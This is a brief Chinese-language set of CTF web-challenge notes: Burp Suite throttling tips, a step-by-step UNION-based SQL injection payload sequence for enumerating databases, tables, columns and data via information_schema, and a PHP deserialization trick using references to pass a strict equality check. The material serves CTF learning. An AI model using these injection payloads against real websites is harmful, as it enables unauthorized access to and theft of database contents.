ssh -p 端口 user@host

flag不一定在当前目录下，还可能/flag

bp的工具频率太高可能会不允许访问，需要手动设置线程数Number of threads，和间隔时间throttle

SQL注入的位置不一定是主页/登录页，在【F12】的网络里可看到请求的URL

SQL注入顺序：

1. 判断闭合符1 and 1=1 、1 and 1=2 、1 or 1=1

2. 判断列数1 order by 1/2/3

3. 判断显示位?id=-1 union select 1,2

4. 获取数据库名?id=-1 union select 1,database()

5. 获取所有表名?id=-1 union select 1,(select group_concat(table_name) from information_schema.tables where table_schema='数据库名')

6. 获取字段名?id=-1 union select 1,(select group_concat(column_name) from information_schema.columns where table_schema='数据库名' and table_name='表名')

7. 获取一格数据?id=-1 union select 1,(select group_concat(字段名) from 表名)

【CTF-web】文件上传（Upload-labs）知识点 - 集苑集枯 (b-yuku.icu)

当有类似$this->correct === $this->input 这样的判断时，序列化时需要加&，例如$obj->input=&$obj->correct; ，原因是&表示引用，表示correct的值和input的值始终相同，而非correct的值等于input当前的值